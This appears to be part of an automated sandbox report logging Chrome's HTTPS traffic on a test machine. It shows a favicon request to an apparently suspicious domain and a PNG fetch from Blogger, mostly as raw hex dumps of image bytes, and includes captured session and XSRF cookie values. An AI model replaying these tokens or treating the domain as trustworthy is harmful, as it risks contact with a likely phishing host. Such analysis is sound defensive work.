                                                    2024-11-25 18:44:38 UTC920INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0d 44 00 00 07 80 08 02 00 00 00 33 3b 2b ce 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec da 21 01 00 20 00 c0 30 a0 7f 58 04 02 49 8c 0b b6 04 0f f0 b9 cf 1d 00 00 00 00 00 00 00 00 00 40 67 d5 01 00 00 00 00 00 00 00 00 00 f0 3b 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00
                                                    Data Ascii: PNGIHDRD3;+sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx! 0XI@g;3|3@
                                                    2024-11-25 18:44:38 UTC1390INData Raw: 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00
                                                    Data Ascii: 3@13|3@13|3@13|3@13|3@13|3
                                                    2024-11-25 18:44:38 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31
                                                    Data Ascii: 13|3@13|3@13|3@13|3@13|3@1
                                                    2024-11-25 18:44:38 UTC1390INData Raw: 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00
                                                    Data Ascii: |3@13|3@13|3@13|3@13|3@13|
                                                    2024-11-25 18:44:38 UTC1390INData Raw: 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 f0 d8 bb 9f 10 39 cf fb 80 e3 cf fb 67 fe ac 64 cb 76 40 71 da 83 9c 3f 26 14 c9 92 bd 4a 23 0c b1 72 68 c8 b1 e9 a1 89 43 b1 8a 88 15 50 a1 31 24 84 1a 92 42 08 3d e4 90 1c da a2 50 30 54 04 51 19 23 27 a7 96 d2 43 88 09 c6 2d c1 c1 5e 6b ad f5 21 b4 49 ab 43 53 67 a1 5a 39 52 b5 ab dd d9 e9 61 e3 ad ab 3f bb 3b b3 b3 fb 7b 9f 99 cf e7 60 76 77 e6 7d fd bb 8d c7 cf f7 7d 1e 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00
                                                    Data Ascii: @13|3@13|3@9gdv@q?&J#rhCP1$B=P0TQ#'C-^k!ICSgZ9Ra?;{`vw}}&
                                                    2024-11-25 18:44:38 UTC1390INData Raw: 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: &`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>
                                                    2024-11-25 18:44:38 UTC1390INData Raw: e3 c3 e7 3a 00 64 ac 28 52 d7 53 77 00 00 00 00 00 30 a9 ba ed ba 70 78 0f 00 8c 0b 31 1f 00 64 ac db aa 4b df d1 01 00 00 00 00 60 52 95 45 d1 6d 79 ec 1f 00 c6 84 98 0f 00 72 55 55 0e d8 05 00 00 00 00 80 49 d7 6e 55 55 65 e9 1f 00 c6 81 4f 74 00 c8 55 57 c9 07 00 00 00 00 00 58 32 00 80 71 21 e6 03 80 2c b5 ea b2 f6 98 1d 00 00 00 00 00 90 52 5d 95 ad da aa 01 00 64 cf c7 39 00 64 a9 d3 aa a3 47 00 00 00 00 00 00 9a c2 c2 01 00 8c 01 31 1f 00 e4 a7 55 57 55 59 44 4f 01 00 00 00 00 00 34 45 55 16 ad da 61 bb 00 90 37 31 1f 00 e4 a7 d3 f2 6d 1c 00 00 00 00 00 f8 7f 2c 1f 00 40 ee c4 7c 00 90 99 ba 2a 6d cb 07 00 00 00 00 00 dc a2 2a 8b ba d2 00 00 40 c6 7c 90 03 40 66 3c 57 07 00 00 00 00 00 dc 91 45 04 00 c8 9a 98 0f 00 72 52 7a a8 0e 00 00 00 00 00 b8
                                                    Data Ascii: :d(RSw0px1dK`REmyrUUInUUeOtUWX2q!,R]d9dG1UWUYDO4EUa71m,@|*m*@|@f<WErRz
                                                    2024-11-25 18:44:38 UTC1390INData Raw: 64 3a 7a 0a 00 00 00 00 00 00 00 9a 4e cc 07 00 64 23 c7 92 af 73 e2 54 f4 14 00 00 00 00 00 00 00 64 40 cc 07 00 e4 41 c9 07 00 00 00 00 00 00 c0 18 13 f3 01 00 19 50 f2 01 00 00 00 00 00 00 30 de c4 7c 00 40 d3 ad cc ce 28 f9 00 00 00 00 00 00 00 18 6f 75 f4 00 00 00 9b b8 f2 d5 d3 3b 77 f3 ee f4 b1 b5 1f da 47 a6 d7 7e b8 39 3b 93 52 5a 9c 79 75 b8 1b 2a f9 00 00 00 00 00 00 00 18 82 98 0f 00 68 b4 5f 3f fb a5 91 df b3 3b 7d 6c ea c4 a9 94 52 fd 6e c0 f7 5e 9d 94 52 4a f7 a6 94 52 5a 3a 7f 36 a5 b4 f5 7d 01 95 7c 00 00 00 00 00 00 00 0c a7 58 b8 b6 18 3d 03 00 b0 89 fb f6 76 a2 47 88 b1 74 fe ec 08 0f d8 5d 6b f8 ee 18 f0 8d 64 12 25 1f 00 00 00 00 00 8d 72 f5 fa 52 f4 08 00 c0 00 c4 7c 00 90 81 89 8d f9 e6 3f 7d 6c 24 f7 d9 4e c6 f7 5e 1b 24 7d 4a 3e
                                                    Data Ascii: d:zNd#sTd@AP0|@(ou;wG~9;RZyu*h_?;}lRn^RJRZ:6}|X=vGt]kd%rR|?}l$N^$}J>
                                                    2024-11-25 18:44:38 UTC1390INData Raw: ae 1f 7b 7c fe 33 2f 2f ef bd fd a5 86 6c ce 37 dc 19 bb 8f 3d 54 8f 7c 12 00 00 00 00 00 00 00 f2 22 e6 03 00 1a a4 78 e0 f1 bb bd 74 cb d1 ba b7 78 e5 ed 37 cf cd bd b8 33 43 6d d5 ec e5 de 70 67 ec 1e 7e a8 18 f9 30 00 00 00 00 00 00 00 e4 45 cc 07 00 34 c8 dd 4e da dd b8 e4 5b 73 e6 d2 85 1d 98 68 00 c3 6d cb 97 52 72 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 59 aa 0f 9d 79 ef af 97 6e 3e fc f8 fc 67 36 2d f9 d6 7c f9 c7 df dc 91 99 b6 60 e8 6d f9 8e 1e 70 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 c1 5e b8 7e ec 8b 57 0f 6e fd fd 51 87 ed ce 5e ee 7d e5 fc 8d e1 ae fd e3 4f b6 46 3b 0c 00 00 00 00 00 00 00 39 12 f3 01 00 cd b2 7e d2 ee 56 8e d6 bd dd 99 4b 17 76 bf e7 1b fa 80 dd e4 8c 5d 00 00 00 00 00 00 00 52 4a 29 39 d6 0d 00 68 9c 7f ff f0 0b 7f f3 fa
                                                    Data Ascii: {|3//l7=T|"xtx73Cmpg~0E4N[shmRr.b>Yyn>g6-|`mp.b>^~WnQ^}OF;9~VKv]RJ)9h
                                                    2024-11-25 18:44:38 UTC1390INData Raw: 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13
                                                    Data Ascii: @01@01@01@01@01@01@01@01@01@01


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.449793104.21.63.274432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:38 UTC1319OUTGET /favicon.ico HTTP/1.1
                                                    Host: nl.nsiciumbe.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://nl.nsiciumbe.com/aXqrQHt/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cookie: XSRF-TOKEN=eyJpdiI6IndoT3E0amV6TWI2QjYwVmZyQm44d3c9PSIsInZhbHVlIjoidTE4bGl2ellacHF0aVl5clFaUDc0NVhpdFlWQ1dlNG9XNDZzMzZwWm5IY0g2M2dLM1FOKzljRXhiMCtyYmR6eG50UEE3cU5Id3JJNFdTdXV6OXlBVUpjVGd0SjZkSVJCR3pJL2ZFazVDRjhHTkJoQjc3bTMvdFdrVXVxYkZiMEYiLCJtYWMiOiJmZTMwOTBjZjgzZWE5NzEyY2NiMjFlODg0MDRiMmQwY2Y1MDM0Y2NmZWI2MGMxMzVjNzU0Y2ExY2JjNzgxOTAzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxsVERWZVRpWW5DbndndkJhdnRyOXc9PSIsInZhbHVlIjoiQ3AyajRiVlJBa0dsRHNLallKVFZncjE5ZnZaZGlqVW81dGcyY0MzU0QraHpzMC9jWHZTK3JZYWs1enJEZ1JoVTFYYW1JR1JQZU85OHN2NmhTR0NVSENVN0UxUFNaM2JTWklaYmN4U3prMHRXbGdleHhoQ0hDRFVwMXJtYWI2S0YiLCJtYWMiOiJhNjc1MjFhMTY1ZDdmMDFiOTc0M2E5MDM0ZDg3MTQ5Mzk5NGMxZGE3ZTZjMzU4NzBkNzYxYTY1NTMzNWM1NTZmIiwidGFnIjoiIn0%3D
                                                    2024-11-25 18:44:38 UTC1036INHTTP/1.1 404 Not Found
                                                    Date: Mon, 25 Nov 2024 18:44:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=14400
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ek%2F%2FV9upZKQuA%2FRHsyDfpn47ZTf5WV0rEtxgVmOKzFXP3eAKsy%2B33ZlWUTfyyBQAA9MB2qhwLMuHT0x11KU2PV%2Bf8Q9z%2FlueFzpcogQmGAuYAq%2BQhWFzbFEQjmxBwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Vary: Accept-Encoding
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3027&sent=233&recv=109&lost=0&retrans=1&sent_bytes=244953&recv_bytes=11849&delivery_rate=13410958&cwnd=287&unsent_bytes=0&cid=dfaf8d8df51a1fa9&ts=1345870&x=0"
                                                    CF-Cache-Status: HIT
                                                    Age: 27
                                                    Server: cloudflare
                                                    CF-RAY: 8e83ca8dac1b41d3-EWR
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2143&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1897&delivery_rate=1405873&cwnd=224&unsent_bytes=0&cid=a16f948e74470f5c&ts=7918&x=0"
                                                    2024-11-25 18:44:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.449798172.217.19.2254432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:40 UTC680OUTGET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1
                                                    Host: blogger.googleusercontent.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:41 UTC470INHTTP/1.1 200 OK
                                                    Content-Type: image/png
                                                    Vary: Origin
                                                    Access-Control-Expose-Headers: Content-Length
                                                    ETag: "v367e"
                                                    Expires: Tue, 26 Nov 2024 18:44:41 GMT
                                                    Cache-Control: public, max-age=86400, no-transform
                                                    Content-Disposition: inline;filename="userinter.png"
                                                    X-Content-Type-Options: nosniff
                                                    Date: Mon, 25 Nov 2024 18:44:41 GMT
                                                    Server: fife
                                                    Content-Length: 87859
                                                    X-XSS-Protection: 0
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close
                                                    2024-11-25 18:44:41 UTC920INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0d 44 00 00 07 80 08 02 00 00 00 33 3b 2b ce 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec da 21 01 00 20 00 c0 30 a0 7f 58 04 02 49 8c 0b b6 04 0f f0 b9 cf 1d 00 00 00 00 00 00 00 00 00 40 67 d5 01 00 00 00 00 00 00 00 00 00 f0 3b 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00
                                                    Data Ascii: PNGIHDRD3;+sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx! 0XI@g;3|3@
                                                    2024-11-25 18:44:41 UTC1390INData Raw: 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00
                                                    Data Ascii: 3@13|3@13|3@13|3@13|3@13|3
                                                    2024-11-25 18:44:41 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31
                                                    Data Ascii: 13|3@13|3@13|3@13|3@13|3@1
                                                    2024-11-25 18:44:41 UTC1390INData Raw: 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00
                                                    Data Ascii: |3@13|3@13|3@13|3@13|3@13|
                                                    2024-11-25 18:44:41 UTC1390INData Raw: 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 f0 d8 bb 9f 10 39 cf fb 80 e3 cf fb 67 fe ac 64 cb 76 40 71 da 83 9c 3f 26 14 c9 92 bd 4a 23 0c b1 72 68 c8 b1 e9 a1 89 43 b1 8a 88 15 50 a1 31 24 84 1a 92 42 08 3d e4 90 1c da a2 50 30 54 04 51 19 23 27 a7 96 d2 43 88 09 c6 2d c1 c1 5e 6b ad f5 21 b4 49 ab 43 53 67 a1 5a 39 52 b5 ab dd d9 e9 61 e3 ad ab 3f bb 3b b3 b3 fb 7b 9f 99 cf e7 60 76 77 e6 7d fd bb 8d c7 cf f7 7d 1e 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00
                                                    Data Ascii: @13|3@13|3@9gdv@q?&J#rhCP1$B=P0TQ#'C-^k!ICSgZ9Ra?;{`vw}}&
                                                    2024-11-25 18:44:41 UTC1390INData Raw: 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: &`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>
                                                    2024-11-25 18:44:41 UTC1390INData Raw: e3 c3 e7 3a 00 64 ac 28 52 d7 53 77 00 00 00 00 00 30 a9 ba ed ba 70 78 0f 00 8c 0b 31 1f 00 64 ac db aa 4b df d1 01 00 00 00 00 60 52 95 45 d1 6d 79 ec 1f 00 c6 84 98 0f 00 72 55 55 0e d8 05 00 00 00 00 80 49 d7 6e 55 55 65 e9 1f 00 c6 81 4f 74 00 c8 55 57 c9 07 00 00 00 00 00 58 32 00 80 71 21 e6 03 80 2c b5 ea b2 f6 98 1d 00 00 00 00 00 90 52 5d 95 ad da aa 01 00 64 cf c7 39 00 64 a9 d3 aa a3 47 00 00 00 00 00 00 9a c2 c2 01 00 8c 01 31 1f 00 e4 a7 55 57 55 59 44 4f 01 00 00 00 00 00 34 45 55 16 ad da 61 bb 00 90 37 31 1f 00 e4 a7 d3 f2 6d 1c 00 00 00 00 00 f8 7f 2c 1f 00 40 ee c4 7c 00 90 99 ba 2a 6d cb 07 00 00 00 00 00 dc a2 2a 8b ba d2 00 00 40 c6 7c 90 03 40 66 3c 57 07 00 00 00 00 00 dc 91 45 04 00 c8 9a 98 0f 00 72 52 7a a8 0e 00 00 00 00 00 b8
                                                    Data Ascii: :d(RSw0px1dK`REmyrUUInUUeOtUWX2q!,R]d9dG1UWUYDO4EUa71m,@|*m*@|@f<WErRz
                                                    2024-11-25 18:44:41 UTC1390INData Raw: 64 3a 7a 0a 00 00 00 00 00 00 00 9a 4e cc 07 00 64 23 c7 92 af 73 e2 54 f4 14 00 00 00 00 00 00 00 64 40 cc 07 00 e4 41 c9 07 00 00 00 00 00 00 c0 18 13 f3 01 00 19 50 f2 01 00 00 00 00 00 00 30 de c4 7c 00 40 d3 ad cc ce 28 f9 00 00 00 00 00 00 00 18 6f 75 f4 00 00 00 9b b8 f2 d5 d3 3b 77 f3 ee f4 b1 b5 1f da 47 a6 d7 7e b8 39 3b 93 52 5a 9c 79 75 b8 1b 2a f9 00 00 00 00 00 00 00 18 82 98 0f 00 68 b4 5f 3f fb a5 91 df b3 3b 7d 6c ea c4 a9 94 52 fd 6e c0 f7 5e 9d 94 52 4a f7 a6 94 52 5a 3a 7f 36 a5 b4 f5 7d 01 95 7c 00 00 00 00 00 00 00 0c a7 58 b8 b6 18 3d 03 00 b0 89 fb f6 76 a2 47 88 b1 74 fe ec 08 0f d8 5d 6b f8 ee 18 f0 8d 64 12 25 1f 00 00 00 00 00 8d 72 f5 fa 52 f4 08 00 c0 00 c4 7c 00 90 81 89 8d f9 e6 3f 7d 6c 24 f7 d9 4e c6 f7 5e 1b 24 7d 4a 3e
                                                    Data Ascii: d:zNd#sTd@AP0|@(ou;wG~9;RZyu*h_?;}lRn^RJRZ:6}|X=vGt]kd%rR|?}l$N^$}J>
